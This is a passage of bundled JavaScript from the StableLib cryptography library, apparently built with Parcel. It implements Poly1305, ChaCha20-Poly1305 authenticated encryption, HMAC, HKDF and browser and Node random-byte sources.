        var h0 = this._h[0], h1 = this._h[1], h2 = this._h[2], h3 = this._h[3], h4 = this._h[4], h5 = this._h[5], h6 = this._h[6], h7 = this._h[7], h8 = this._h[8], h9 = this._h[9];
        var r0 = this._r[0], r1 = this._r[1], r2 = this._r[2], r3 = this._r[3], r4 = this._r[4], r5 = this._r[5], r6 = this._r[6], r7 = this._r[7], r8 = this._r[8], r9 = this._r[9];
        while(bytes >= 16){
            var t0 = m[mpos + 0] | m[mpos + 1] << 8;
            h0 += t0 & 0x1fff;
            var t1 = m[mpos + 2] | m[mpos + 3] << 8;
            h1 += (t0 >>> 13 | t1 << 3) & 0x1fff;
            var t2 = m[mpos + 4] | m[mpos + 5] << 8;
            h2 += (t1 >>> 10 | t2 << 6) & 0x1fff;
            var t3 = m[mpos + 6] | m[mpos + 7] << 8;
            h3 += (t2 >>> 7 | t3 << 9) & 0x1fff;
            var t4 = m[mpos + 8] | m[mpos + 9] << 8;
            h4 += (t3 >>> 4 | t4 << 12) & 0x1fff;
            h5 += t4 >>> 1 & 0x1fff;
            var t5 = m[mpos + 10] | m[mpos + 11] << 8;
            h6 += (t4 >>> 14 | t5 << 2) & 0x1fff;
            var t6 = m[mpos + 12] | m[mpos + 13] << 8;
            h7 += (t5 >>> 11 | t6 << 5) & 0x1fff;
            var t7 = m[mpos + 14] | m[mpos + 15] << 8;
            h8 += (t6 >>> 8 | t7 << 8) & 0x1fff;
            h9 += t7 >>> 5 | hibit;
            var c = 0;
            var d0 = c;
            d0 += h0 * r0;
            d0 += h1 * (5 * r9);
            d0 += h2 * (5 * r8);
            d0 += h3 * (5 * r7);
            d0 += h4 * (5 * r6);
            c = d0 >>> 13;
            d0 &= 0x1fff;
            d0 += h5 * (5 * r5);
            d0 += h6 * (5 * r4);
            d0 += h7 * (5 * r3);
            d0 += h8 * (5 * r2);
            d0 += h9 * (5 * r1);
            c += d0 >>> 13;
            d0 &= 0x1fff;
            var d1 = c;
            d1 += h0 * r1;
            d1 += h1 * r0;
            d1 += h2 * (5 * r9);
            d1 += h3 * (5 * r8);
            d1 += h4 * (5 * r7);
            c = d1 >>> 13;
            d1 &= 0x1fff;
            d1 += h5 * (5 * r6);
            d1 += h6 * (5 * r5);
            d1 += h7 * (5 * r4);
            d1 += h8 * (5 * r3);
            d1 += h9 * (5 * r2);
            c += d1 >>> 13;
            d1 &= 0x1fff;
            var d2 = c;
            d2 += h0 * r2;
            d2 += h1 * r1;
            d2 += h2 * r0;
            d2 += h3 * (5 * r9);
            d2 += h4 * (5 * r8);
            c = d2 >>> 13;
            d2 &= 0x1fff;
            d2 += h5 * (5 * r7);
            d2 += h6 * (5 * r6);
            d2 += h7 * (5 * r5);
            d2 += h8 * (5 * r4);
            d2 += h9 * (5 * r3);
            c += d2 >>> 13;
            d2 &= 0x1fff;
            var d3 = c;
            d3 += h0 * r3;
            d3 += h1 * r2;
            d3 += h2 * r1;
            d3 += h3 * r0;
            d3 += h4 * (5 * r9);
            c = d3 >>> 13;
            d3 &= 0x1fff;
            d3 += h5 * (5 * r8);
            d3 += h6 * (5 * r7);
            d3 += h7 * (5 * r6);
            d3 += h8 * (5 * r5);
            d3 += h9 * (5 * r4);
            c += d3 >>> 13;
            d3 &= 0x1fff;
            var d4 = c;
            d4 += h0 * r4;
            d4 += h1 * r3;
            d4 += h2 * r2;
            d4 += h3 * r1;
            d4 += h4 * r0;
            c = d4 >>> 13;
            d4 &= 0x1fff;
            d4 += h5 * (5 * r9);
            d4 += h6 * (5 * r8);
            d4 += h7 * (5 * r7);
            d4 += h8 * (5 * r6);
            d4 += h9 * (5 * r5);
            c += d4 >>> 13;
            d4 &= 0x1fff;
            var d5 = c;
            d5 += h0 * r5;
            d5 += h1 * r4;
            d5 += h2 * r3;
            d5 += h3 * r2;
            d5 += h4 * r1;
            c = d5 >>> 13;
            d5 &= 0x1fff;
            d5 += h5 * r0;
            d5 += h6 * (5 * r9);
            d5 += h7 * (5 * r8);
            d5 += h8 * (5 * r7);
            d5 += h9 * (5 * r6);
            c += d5 >>> 13;
            d5 &= 0x1fff;
            var d6 = c;
            d6 += h0 * r6;
            d6 += h1 * r5;
            d6 += h2 * r4;
            d6 += h3 * r3;
            d6 += h4 * r2;
            c = d6 >>> 13;
            d6 &= 0x1fff;
            d6 += h5 * r1;
            d6 += h6 * r0;
            d6 += h7 * (5 * r9);
            d6 += h8 * (5 * r8);
            d6 += h9 * (5 * r7);
            c += d6 >>> 13;
            d6 &= 0x1fff;
            var d7 = c;
            d7 += h0 * r7;
            d7 += h1 * r6;
            d7 += h2 * r5;
            d7 += h3 * r4;
            d7 += h4 * r3;
            c = d7 >>> 13;
            d7 &= 0x1fff;
            d7 += h5 * r2;
            d7 += h6 * r1;
            d7 += h7 * r0;
            d7 += h8 * (5 * r9);
            d7 += h9 * (5 * r8);
            c += d7 >>> 13;
            d7 &= 0x1fff;
            var d8 = c;
            d8 += h0 * r8;
            d8 += h1 * r7;
            d8 += h2 * r6;
            d8 += h3 * r5;
            d8 += h4 * r4;
            c = d8 >>> 13;
            d8 &= 0x1fff;
            d8 += h5 * r3;
            d8 += h6 * r2;
            d8 += h7 * r1;
            d8 += h8 * r0;
            d8 += h9 * (5 * r9);
            c += d8 >>> 13;
            d8 &= 0x1fff;
            var d9 = c;
            d9 += h0 * r9;
            d9 += h1 * r8;
            d9 += h2 * r7;
            d9 += h3 * r6;
            d9 += h4 * r5;
            c = d9 >>> 13;
            d9 &= 0x1fff;
            d9 += h5 * r4;
            d9 += h6 * r3;
            d9 += h7 * r2;
            d9 += h8 * r1;
            d9 += h9 * r0;
            c += d9 >>> 13;
            d9 &= 0x1fff;
            c = (c << 2) + c | 0;
            c = c + d0 | 0;
            d0 = c & 0x1fff;
            c = c >>> 13;
            d1 += c;
            h0 = d0;
            h1 = d1;
            h2 = d2;
            h3 = d3;
            h4 = d4;
            h5 = d5;
            h6 = d6;
            h7 = d7;
            h8 = d8;
            h9 = d9;
            mpos += 16;
            bytes -= 16;
        }
        this._h[0] = h0;
        this._h[1] = h1;
        this._h[2] = h2;
        this._h[3] = h3;
        this._h[4] = h4;
        this._h[5] = h5;
        this._h[6] = h6;
        this._h[7] = h7;
        this._h[8] = h8;
        this._h[9] = h9;
    };
    Poly1305.prototype.finish = function(mac, macpos) {
        if (macpos === void 0) macpos = 0;
        var g = new Uint16Array(10);
        var c;
        var mask;
        var f;
        var i;
        if (this._leftover) {
            i = this._leftover;
            this._buffer[i++] = 1;
            for(; i < 16; i++)this._buffer[i] = 0;
            this._fin = 1;
            this._blocks(this._buffer, 0, 16);
        }
        c = this._h[1] >>> 13;
        this._h[1] &= 0x1fff;
        for(i = 2; i < 10; i++){
            this._h[i] += c;
            c = this._h[i] >>> 13;
            this._h[i] &= 0x1fff;
        }
        this._h[0] += c * 5;
        c = this._h[0] >>> 13;
        this._h[0] &= 0x1fff;
        this._h[1] += c;
        c = this._h[1] >>> 13;
        this._h[1] &= 0x1fff;
        this._h[2] += c;
        g[0] = this._h[0] + 5;
        c = g[0] >>> 13;
        g[0] &= 0x1fff;
        for(i = 1; i < 10; i++){
            g[i] = this._h[i] + c;
            c = g[i] >>> 13;
            g[i] &= 0x1fff;
        }
        g[9] -= 8192;
        mask = (c ^ 1) - 1;
        for(i = 0; i < 10; i++)g[i] &= mask;
        mask = ~mask;
        for(i = 0; i < 10; i++)this._h[i] = this._h[i] & mask | g[i];
        this._h[0] = (this._h[0] | this._h[1] << 13) & 0xffff;
        this._h[1] = (this._h[1] >>> 3 | this._h[2] << 10) & 0xffff;
        this._h[2] = (this._h[2] >>> 6 | this._h[3] << 7) & 0xffff;
        this._h[3] = (this._h[3] >>> 9 | this._h[4] << 4) & 0xffff;
        this._h[4] = (this._h[4] >>> 12 | this._h[5] << 1 | this._h[6] << 14) & 0xffff;
        this._h[5] = (this._h[6] >>> 2 | this._h[7] << 11) & 0xffff;
        this._h[6] = (this._h[7] >>> 5 | this._h[8] << 8) & 0xffff;
        this._h[7] = (this._h[8] >>> 8 | this._h[9] << 5) & 0xffff;
        f = this._h[0] + this._pad[0];
        this._h[0] = f & 0xffff;
        for(i = 1; i < 8; i++){
            f = (this._h[i] + this._pad[i] | 0) + (f >>> 16) | 0;
            this._h[i] = f & 0xffff;
        }
        mac[macpos + 0] = this._h[0] >>> 0;
        mac[macpos + 1] = this._h[0] >>> 8;
        mac[macpos + 2] = this._h[1] >>> 0;
        mac[macpos + 3] = this._h[1] >>> 8;
        mac[macpos + 4] = this._h[2] >>> 0;
        mac[macpos + 5] = this._h[2] >>> 8;
        mac[macpos + 6] = this._h[3] >>> 0;
        mac[macpos + 7] = this._h[3] >>> 8;
        mac[macpos + 8] = this._h[4] >>> 0;
        mac[macpos + 9] = this._h[4] >>> 8;
        mac[macpos + 10] = this._h[5] >>> 0;
        mac[macpos + 11] = this._h[5] >>> 8;
        mac[macpos + 12] = this._h[6] >>> 0;
        mac[macpos + 13] = this._h[6] >>> 8;
        mac[macpos + 14] = this._h[7] >>> 0;
        mac[macpos + 15] = this._h[7] >>> 8;
        this._finished = true;
        return this;
    };
    Poly1305.prototype.update = function(m) {
        var mpos = 0;
        var bytes = m.length;
        var want;
        if (this._leftover) {
            want = 16 - this._leftover;
            if (want > bytes) want = bytes;
            for(var i = 0; i < want; i++)this._buffer[this._leftover + i] = m[mpos + i];
            bytes -= want;
            mpos += want;
            this._leftover += want;
            if (this._leftover < 16) return this;
            this._blocks(this._buffer, 0, 16);
            this._leftover = 0;
        }
        if (bytes >= 16) {
            want = bytes - bytes % 16;
            this._blocks(m, mpos, want);
            mpos += want;
            bytes -= want;
        }
        if (bytes) {
            for(var i = 0; i < bytes; i++)this._buffer[this._leftover + i] = m[mpos + i];
            this._leftover += bytes;
        }
        return this;
    };
    Poly1305.prototype.digest = function() {
        // TODO(dchest): it behaves differently than other hashes/HMAC,
        // because it throws when finished — others just return saved result.
        if (this._finished) throw new Error("Poly1305 was finished");
        var mac = new Uint8Array(16);
        this.finish(mac);
        return mac;
    };
    Poly1305.prototype.clean = function() {
        $276678191c4bdb56$exports.wipe(this._buffer);
        $276678191c4bdb56$exports.wipe(this._r);
        $276678191c4bdb56$exports.wipe(this._h);
        $276678191c4bdb56$exports.wipe(this._pad);
        this._leftover = 0;
        this._fin = 0;
        this._finished = true; // mark as finished even if not
        return this;
    };
    return Poly1305;
}();
$bc2eb21e5dd3f530$exports.Poly1305 = $bc2eb21e5dd3f530$var$Poly1305;
/**
 * Returns 16-byte authenticator of data using a one-time 32-byte key.
 *
 * Important: key should be used for only one message, it should never repeat.
 */ function $bc2eb21e5dd3f530$var$oneTimeAuth(key, data) {
    var h = new $bc2eb21e5dd3f530$var$Poly1305(key);
    h.update(data);
    var digest = h.digest();
    h.clean();
    return digest;
}
$bc2eb21e5dd3f530$exports.oneTimeAuth = $bc2eb21e5dd3f530$var$oneTimeAuth;
/**
 * Returns true if two authenticators are 16-byte long and equal.
 * Uses contant-time comparison to avoid leaking timing information.
 */ function $bc2eb21e5dd3f530$var$equal(a, b) {
    if (a.length !== $bc2eb21e5dd3f530$exports.DIGEST_LENGTH || b.length !== $bc2eb21e5dd3f530$exports.DIGEST_LENGTH) return false;
    return $0806512cf7f87b87$exports.equal(a, b);
}
$bc2eb21e5dd3f530$exports.equal = $bc2eb21e5dd3f530$var$equal;





$1ca962bc0b1868f1$exports.KEY_LENGTH = 32;
$1ca962bc0b1868f1$exports.NONCE_LENGTH = 12;
$1ca962bc0b1868f1$exports.TAG_LENGTH = 16;
var $1ca962bc0b1868f1$var$ZEROS = new Uint8Array(16);
/**
 * ChaCha20-Poly1305 Authenticated Encryption with Associated Data.
 *
 * Defined in RFC7539.
 */ var $1ca962bc0b1868f1$var$ChaCha20Poly1305 = /** @class */ function() {
    /**
     * Creates a new instance with the given 32-byte key.
     */ function ChaCha20Poly1305(key) {
        this.nonceLength = $1ca962bc0b1868f1$exports.NONCE_LENGTH;
        this.tagLength = $1ca962bc0b1868f1$exports.TAG_LENGTH;
        if (key.length !== $1ca962bc0b1868f1$exports.KEY_LENGTH) throw new Error("ChaCha20Poly1305 needs 32-byte key");
        // Copy key.
        this._key = new Uint8Array(key);
    }
    /**
     * Encrypts and authenticates plaintext, authenticates associated data,
     * and returns sealed ciphertext, which includes authentication tag.
     *
     * RFC7539 specifies 12 bytes for nonce. It may be this 12-byte nonce
     * ("IV"), or full 16-byte counter (called "32-bit fixed-common part")
     * and nonce.
     *
     * If dst is given (it must be the size of plaintext + the size of tag
     * length) the result will be put into it. Dst and plaintext must not
     * overlap.
     */ ChaCha20Poly1305.prototype.seal = function(nonce, plaintext, associatedData, dst) {
        if (nonce.length > 16) throw new Error("ChaCha20Poly1305: incorrect nonce length");
        // Allocate space for counter, and set nonce as last bytes of it.
        var counter = new Uint8Array(16);
        counter.set(nonce, counter.length - nonce.length);
        // Generate authentication key by taking first 32-bytes of stream.
        // We pass full counter, which has 12-byte nonce and 4-byte block counter,
        // and it will get incremented after generating the block, which is
        // exactly what we need: we only use the first 32 bytes of 64-byte
        // ChaCha block and discard the next 32 bytes.
        var authKey = new Uint8Array(32);
        $3ca0635e21db662f$exports.stream(this._key, counter, authKey, 4);
        // Allocate space for sealed ciphertext.
        var resultLength = plaintext.length + this.tagLength;
        var result;
        if (dst) {
            if (dst.length !== resultLength) throw new Error("ChaCha20Poly1305: incorrect destination length");
            result = dst;
        } else result = new Uint8Array(resultLength);
        // Encrypt plaintext.
        $3ca0635e21db662f$exports.streamXOR(this._key, counter, plaintext, result, 4);
        // Authenticate.
        // XXX: can "simplify" here: pass full result (which is already padded
        // due to zeroes prepared for tag), and ciphertext length instead of
        // subarray of result.
        this._authenticate(result.subarray(result.length - this.tagLength, result.length), authKey, result.subarray(0, result.length - this.tagLength), associatedData);
        // Cleanup.
        $276678191c4bdb56$exports.wipe(counter);
        return result;
    };
    /**
     * Authenticates sealed ciphertext (which includes authentication tag) and
     * associated data, decrypts ciphertext and returns decrypted plaintext.
     *
     * RFC7539 specifies 12 bytes for nonce. It may be this 12-byte nonce
     * ("IV"), or full 16-byte counter (called "32-bit fixed-common part")
     * and nonce.
     *
     * If authentication fails, it returns null.
     *
     * If dst is given (it must be of ciphertext length minus tag length),
     * the result will be put into it. Dst and plaintext must not overlap.
     */ ChaCha20Poly1305.prototype.open = function(nonce, sealed, associatedData, dst) {
        if (nonce.length > 16) throw new Error("ChaCha20Poly1305: incorrect nonce length");
        // Sealed ciphertext should at least contain tag.
        if (sealed.length < this.tagLength) // TODO(dchest): should we throw here instead?
        return null;
        // Allocate space for counter, and set nonce as last bytes of it.
        var counter = new Uint8Array(16);
        counter.set(nonce, counter.length - nonce.length);
        // Generate authentication key by taking first 32-bytes of stream.
        var authKey = new Uint8Array(32);
        $3ca0635e21db662f$exports.stream(this._key, counter, authKey, 4);
        // Authenticate.
        // XXX: can simplify and avoid allocation: since authenticate()
        // already allocates tag (from Poly1305.digest(), it can return)
        // it instead of copying to calculatedTag. But then in seal()
        // we'll need to copy it.
        var calculatedTag = new Uint8Array(this.tagLength);
        this._authenticate(calculatedTag, authKey, sealed.subarray(0, sealed.length - this.tagLength), associatedData);
        // Constant-time compare tags and return null if they differ.
        if (!$0806512cf7f87b87$exports.equal(calculatedTag, sealed.subarray(sealed.length - this.tagLength, sealed.length))) return null;
        // Allocate space for decrypted plaintext.
        var resultLength = sealed.length - this.tagLength;
        var result;
        if (dst) {
            if (dst.length !== resultLength) throw new Error("ChaCha20Poly1305: incorrect destination length");
            result = dst;
        } else result = new Uint8Array(resultLength);
        // Decrypt.
        $3ca0635e21db662f$exports.streamXOR(this._key, counter, sealed.subarray(0, sealed.length - this.tagLength), result, 4);
        // Cleanup.
        $276678191c4bdb56$exports.wipe(counter);
        return result;
    };
    ChaCha20Poly1305.prototype.clean = function() {
        $276678191c4bdb56$exports.wipe(this._key);
        return this;
    };
    ChaCha20Poly1305.prototype._authenticate = function(tagOut, authKey, ciphertext, associatedData) {
        // Initialize Poly1305 with authKey.
        var h = new $bc2eb21e5dd3f530$exports.Poly1305(authKey);
        // Authenticate padded associated data.
        if (associatedData) {
            h.update(associatedData);
            if (associatedData.length % 16 > 0) h.update($1ca962bc0b1868f1$var$ZEROS.subarray(associatedData.length % 16));
        }
        // Authenticate padded ciphertext.
        h.update(ciphertext);
        if (ciphertext.length % 16 > 0) h.update($1ca962bc0b1868f1$var$ZEROS.subarray(ciphertext.length % 16));
        // Authenticate length of associated data.
        // XXX: can avoid allocation here?
        var length = new Uint8Array(8);
        if (associatedData) $ddd89ca0ca71c6d3$exports.writeUint64LE(associatedData.length, length);
        h.update(length);
        // Authenticate length of ciphertext.
        $ddd89ca0ca71c6d3$exports.writeUint64LE(ciphertext.length, length);
        h.update(length);
        // Get tag and copy it into tagOut.
        var tag = h.digest();
        for(var i = 0; i < tag.length; i++)tagOut[i] = tag[i];
        // Cleanup.
        h.clean();
        $276678191c4bdb56$exports.wipe(tag);
        $276678191c4bdb56$exports.wipe(length);
    };
    return ChaCha20Poly1305;
}();
$1ca962bc0b1868f1$exports.ChaCha20Poly1305 = $1ca962bc0b1868f1$var$ChaCha20Poly1305;


var $eea881cb204cba82$exports = {};
"use strict";
// Copyright (C) 2016 Dmitry Chestnykh
// MIT License. See LICENSE file for details.
Object.defineProperty($eea881cb204cba82$exports, "__esModule", {
    value: true
});
var $34e6ca18c8d3a670$exports = {};
"use strict";
// Copyright (C) 2016 Dmitry Chestnykh
// MIT License. See LICENSE file for details.
Object.defineProperty($34e6ca18c8d3a670$exports, "__esModule", {
    value: true
});
var $c3d16a0ee606048e$exports = {};
"use strict";
// Copyright (C) 2016 Dmitry Chestnykh
// MIT License. See LICENSE file for details.
Object.defineProperty($c3d16a0ee606048e$exports, "__esModule", {
    value: true
});
function $c3d16a0ee606048e$var$isSerializableHash(h) {
    return typeof h.saveState !== "undefined" && typeof h.restoreState !== "undefined" && typeof h.cleanSavedState !== "undefined";
}
$c3d16a0ee606048e$exports.isSerializableHash = $c3d16a0ee606048e$var$isSerializableHash; // TODO(dchest): figure out the standardized interface for XOF such as
 // SHAKE and BLAKE2X.




/**
 *  HMAC implements hash-based message authentication algorithm.
 */ var $34e6ca18c8d3a670$var$HMAC = /** @class */ function() {
    /**
     * Constructs a new HMAC with the given Hash and secret key.
     */ function HMAC(hash, key) {
        this._finished = false; // true if HMAC was finalized
        // Initialize inner and outer hashes.
        this._inner = new hash();
        this._outer = new hash();
        // Set block and digest sizes for this HMAC
        // instance to values from the hash.
        this.blockSize = this._outer.blockSize;
        this.digestLength = this._outer.digestLength;
        // Pad temporary stores a key (or its hash) padded with zeroes.
        var pad = new Uint8Array(this.blockSize);
        if (key.length > this.blockSize) // If key is bigger than hash block size, it must be
        // hashed and this hash is used as a key instead.
        this._inner.update(key).finish(pad).clean();
        else // Otherwise, copy the key into pad.
        pad.set(key);
        // Now two different keys are derived from padded key
        // by xoring a different byte value to each.
        // To make inner hash key, xor byte 0x36 into pad.
        for(var i = 0; i < pad.length; i++)pad[i] ^= 0x36;
        // Update inner hash with the result.
        this._inner.update(pad);
        // To make outer hash key, xor byte 0x5c into pad.
        // But since we already xored 0x36 there, we must
        // first undo this by xoring it again.
        for(var i = 0; i < pad.length; i++)pad[i] ^= 106;
        // Update outer hash with the result.
        this._outer.update(pad);
        // Save states of both hashes, so that we can quickly restore
        // them later in reset() without the need to remember the actual
        // key and perform this initialization again.
        if ($c3d16a0ee606048e$exports.isSerializableHash(this._inner) && $c3d16a0ee606048e$exports.isSerializableHash(this._outer)) {
            this._innerKeyedState = this._inner.saveState();
            this._outerKeyedState = this._outer.saveState();
        }
        // Clean pad.
        $276678191c4bdb56$exports.wipe(pad);
    }
    /**
     * Returns HMAC state to the state initialized with key
     * to make it possible to run HMAC over the other data with the same
     * key without creating a new instance.
     */ HMAC.prototype.reset = function() {
        if (!$c3d16a0ee606048e$exports.isSerializableHash(this._inner) || !$c3d16a0ee606048e$exports.isSerializableHash(this._outer)) throw new Error("hmac: can't reset() because hash doesn't implement restoreState()");
        // Restore keyed states of inner and outer hashes.
        this._inner.restoreState(this._innerKeyedState);
        this._outer.restoreState(this._outerKeyedState);
        this._finished = false;
        return this;
    };
    /**
     * Cleans HMAC state.
     */ HMAC.prototype.clean = function() {
        if ($c3d16a0ee606048e$exports.isSerializableHash(this._inner)) this._inner.cleanSavedState(this._innerKeyedState);
        if ($c3d16a0ee606048e$exports.isSerializableHash(this._outer)) this._outer.cleanSavedState(this._outerKeyedState);
        this._inner.clean();
        this._outer.clean();
    };
    /**
     * Updates state with provided data.
     */ HMAC.prototype.update = function(data) {
        this._inner.update(data);
        return this;
    };
    /**
     * Finalizes HMAC and puts the result in out.
     */ HMAC.prototype.finish = function(out) {
        if (this._finished) {
            // If HMAC was finalized, outer hash is also finalized,
            // so it produces the same digest it produced when it
            // was finalized.
            this._outer.finish(out);
            return this;
        }
        // Finalize inner hash and store the result temporarily.
        this._inner.finish(out);
        // Update outer hash with digest of inner hash and and finalize it.
        this._outer.update(out.subarray(0, this.digestLength)).finish(out);
        this._finished = true;
        return this;
    };
    /**
     * Returns the computed message authentication code.
     */ HMAC.prototype.digest = function() {
        var out = new Uint8Array(this.digestLength);
        this.finish(out);
        return out;
    };
    /**
     * Saves HMAC state.
     * This function is needed for PBKDF2 optimization.
     */ HMAC.prototype.saveState = function() {
        if (!$c3d16a0ee606048e$exports.isSerializableHash(this._inner)) throw new Error("hmac: can't saveState() because hash doesn't implement it");
        return this._inner.saveState();
    };
    HMAC.prototype.restoreState = function(savedState) {
        if (!$c3d16a0ee606048e$exports.isSerializableHash(this._inner) || !$c3d16a0ee606048e$exports.isSerializableHash(this._outer)) throw new Error("hmac: can't restoreState() because hash doesn't implement it");
        this._inner.restoreState(savedState);
        this._outer.restoreState(this._outerKeyedState);
        this._finished = false;
        return this;
    };
    HMAC.prototype.cleanSavedState = function(savedState) {
        if (!$c3d16a0ee606048e$exports.isSerializableHash(this._inner)) throw new Error("hmac: can't cleanSavedState() because hash doesn't implement it");
        this._inner.cleanSavedState(savedState);
    };
    return HMAC;
}();
$34e6ca18c8d3a670$exports.HMAC = $34e6ca18c8d3a670$var$HMAC;
/**
 * Returns HMAC using the given hash constructor for the key over data.
 */ function $34e6ca18c8d3a670$var$hmac(hash, key, data) {
    var h = new $34e6ca18c8d3a670$var$HMAC(hash, key);
    h.update(data);
    var digest = h.digest();
    h.clean();
    return digest;
}
$34e6ca18c8d3a670$exports.hmac = $34e6ca18c8d3a670$var$hmac;
/**
 * Returns true if two HMAC digests are equal.
 * Uses constant-time comparison to avoid leaking timing information.
 *
 * Example:
 *
 *    const receivedDigest = ...
 *    const realDigest = hmac(SHA256, key, data);
 *    if (!equal(receivedDigest, realDigest)) {
 *        throw new Error("Authentication error");
 *    }
 */ $34e6ca18c8d3a670$exports.equal = $0806512cf7f87b87$exports.equal;



/**
 * HMAC-based Extract-and-Expand Key Derivation Function.
 *
 * Implements HKDF from RFC5869.
 *
 * Expands the given master key with salt and info into
 * a limited stream of key material.
 */ var $eea881cb204cba82$var$HKDF = /** @class */ function() {
    /**
     * Create a new HKDF instance for the given hash function
     * with the master key, optional salt, and info.
     *
     * - Master key is a high-entropy secret key (not a password).
     * - Salt is a non-secret random value.
     * - Info is application- and/or context-specific information.
     */ function HKDF(hash, key, salt, info) {
        if (salt === void 0) salt = new Uint8Array(0);
        this._counter = new Uint8Array(1); // starts with zero
        this._hash = hash;
        this._info = info;
        // HKDF-Extract uses salt as HMAC key, and key as data.
        var okm = $34e6ca18c8d3a670$exports.hmac(this._hash, salt, key);
        // Initialize HMAC for expanding with extracted key.
        this._hmac = new $34e6ca18c8d3a670$exports.HMAC(hash, okm);
        // Allocate buffer.
        this._buffer = new Uint8Array(this._hmac.digestLength);
        this._bufpos = this._buffer.length;
    }
    // Fill buffer with new block of HKDF-Extract output.
    HKDF.prototype._fillBuffer = function() {
        // Increment counter.
        this._counter[0]++;
        var ctr = this._counter[0];
        // Check if counter overflowed.
        if (ctr === 0) throw new Error("hkdf: cannot expand more");
        // Prepare HMAC instance for new data with old key.
        this._hmac.reset();
        // Hash in previous output if it was generated
        // (i.e. counter is greater than 1).
        if (ctr > 1) this._hmac.update(this._buffer);
        // Hash in info if it exists.
        if (this._info) this._hmac.update(this._info);
        // Hash in the counter.
        this._hmac.update(this._counter);
        // Output result to buffer and clean HMAC instance.
        this._hmac.finish(this._buffer);
        // Reset buffer position.
        this._bufpos = 0;
    };
    /**
     * Expand returns next key material of the given length.
     *
     * It throws if expansion limit is reached (which is
     * 254 digests of the underlying HMAC function).
     */ HKDF.prototype.expand = function(length) {
        var out = new Uint8Array(length);
        for(var i = 0; i < out.length; i++){
            if (this._bufpos === this._buffer.length) this._fillBuffer();
            out[i] = this._buffer[this._bufpos++];
        }
        return out;
    };
    HKDF.prototype.clean = function() {
        this._hmac.clean();
        $276678191c4bdb56$exports.wipe(this._buffer);
        $276678191c4bdb56$exports.wipe(this._counter);
        this._bufpos = 0;
    };
    return HKDF;
}();
$eea881cb204cba82$exports.HKDF = $eea881cb204cba82$var$HKDF; // TODO(dchest): maybe implement deriveKey?


var $73945d82524e104e$exports = {};
"use strict";
// Copyright (C) 2016 Dmitry Chestnykh
// MIT License. See LICENSE file for details.
Object.defineProperty($73945d82524e104e$exports, "__esModule", {
    value: true
});
$73945d82524e104e$exports.randomStringForEntropy = $73945d82524e104e$exports.randomString = $73945d82524e104e$exports.randomUint32 = $73945d82524e104e$exports.randomBytes = $73945d82524e104e$exports.defaultRandomSource = void 0;
var $470144fd408ed875$exports = {};
"use strict";
// Copyright (C) 2016 Dmitry Chestnykh
// MIT License. See LICENSE file for details.
Object.defineProperty($470144fd408ed875$exports, "__esModule", {
    value: true
});
$470144fd408ed875$exports.SystemRandomSource = void 0;
var $9ffc14634304d8f4$exports = {};
"use strict";
// Copyright (C) 2016 Dmitry Chestnykh
// MIT License. See LICENSE file for details.
Object.defineProperty($9ffc14634304d8f4$exports, "__esModule", {
    value: true
});
$9ffc14634304d8f4$exports.BrowserRandomSource = void 0;
const $9ffc14634304d8f4$var$QUOTA = 65536;
class $9ffc14634304d8f4$var$BrowserRandomSource {
    constructor(){
        this.isAvailable = false;
        this.isInstantiated = false;
        const browserCrypto = typeof self !== "undefined" ? self.crypto || self.msCrypto // IE11 has msCrypto
         : null;
        if (browserCrypto && browserCrypto.getRandomValues !== undefined) {
            this._crypto = browserCrypto;
            this.isAvailable = true;
            this.isInstantiated = true;
        }
    }
    randomBytes(length) {
        if (!this.isAvailable || !this._crypto) throw new Error("Browser random byte generator is not available.");
        const out = new Uint8Array(length);
        for(let i = 0; i < out.length; i += $9ffc14634304d8f4$var$QUOTA)this._crypto.getRandomValues(out.subarray(i, i + Math.min(out.length - i, $9ffc14634304d8f4$var$QUOTA)));
        return out;
    }
}
$9ffc14634304d8f4$exports.BrowserRandomSource = $9ffc14634304d8f4$var$BrowserRandomSource;


var $d0085be48b1f2335$exports = {};
"use strict";
// Copyright (C) 2016 Dmitry Chestnykh
// MIT License. See LICENSE file for details.
Object.defineProperty($d0085be48b1f2335$exports, "__esModule", {
    value: true
});
$d0085be48b1f2335$exports.NodeRandomSource = void 0;


class $d0085be48b1f2335$var$NodeRandomSource {
    constructor(){
        this.isAvailable = false;
        this.isInstantiated = false;
        {
            const nodeCrypto = (parcelRequire("kjyEk"));
            if (nodeCrypto && nodeCrypto.randomBytes) {
                this._crypto = nodeCrypto;
                this.isAvailable = true;
                this.isInstantiated = true;
            }
        }
    }
    randomBytes(length) {
        if (!this.isAvailable || !this._crypto) throw new Error("Node.js random byte generator is not available.");
        // Get random bytes (result is Buffer).
        let buffer = this._crypto.randomBytes(length);
        // Make sure we got the length that we requested.
        if (buffer.length !== length) throw new Error("NodeRandomSource: got fewer bytes than requested");
        // Allocate output array.
        const out = new Uint8Array(length);
        // Copy bytes from buffer to output.
        for(let i = 0; i < out.length; i++)out[i] = buffer[i];
        // Cleanup.
        (0, $276678191c4bdb56$exports.wipe)(buffer);
        return out;
    }
}
$d0085be48b1f2335$exports.NodeRandomSource = $d0085be48b1f2335$var$NodeRandomSource;


class $470144fd408ed875$var$SystemRandomSource {
    constructor(){
        this.isAvailable = false;
        this.name = "";
        // Try browser.
        this._source = new $9ffc14634304d8f4$exports.BrowserRandomSource();
        if (this._source.isAvailable) {
            this.isAvailable = true;
            this.name = "Browser";
            return;
        }
        // If no browser source, try Node.
        this._source = new $d0085be48b1f2335$exports.NodeRandomSource();
        if (this._source.isAvailable) {
            this.isAvailable = true;
            this.name = "Node";
            return;
        }
    // No sources, we're out of options.
    }
    randomBytes(length) {
        if (!this.isAvailable) throw new Error("System random byte generator is not available.");
        return this._source.randomBytes(length);
    }
}
$470144fd408ed875$exports.SystemRandomSource = $470144fd408ed875$var$SystemRandomSource;




$73945d82524e104e$exports.defaultRandomSource = new $470144fd408ed875$exports.SystemRandomSource();
function $73945d82524e104e$var$randomBytes(length, prng = $73945d82524e104e$exports.defaultRandomSource) {
    return prng.randomBytes(length);
}
$73945d82524e104e$exports.randomBytes = $73945d82524e104e$var$randomBytes;
/**
 * Returns a uniformly random unsigned 32-bit integer.
 */ function $73945d82524e104e$var$randomUint32(prng = $73945d82524e104e$exports.defaultRandomSource) {
    // Generate 4-byte random buffer.
    const buf = $73945d82524e104e$var$randomBytes(4, prng);
    // Convert bytes from buffer into a 32-bit integer.
    // It's not important which byte order to use, since
    // the result is random.
    const result = (0, $ddd89ca0ca71c6d3$exports.readUint32LE)(buf);
    // Clean the buffer.
    (0, $276678191c4bdb56$exports.wipe)(buf);
    return result;
}
$73945d82524e104e$exports.randomUint32 = $73945d82524e104e$var$randomUint32;
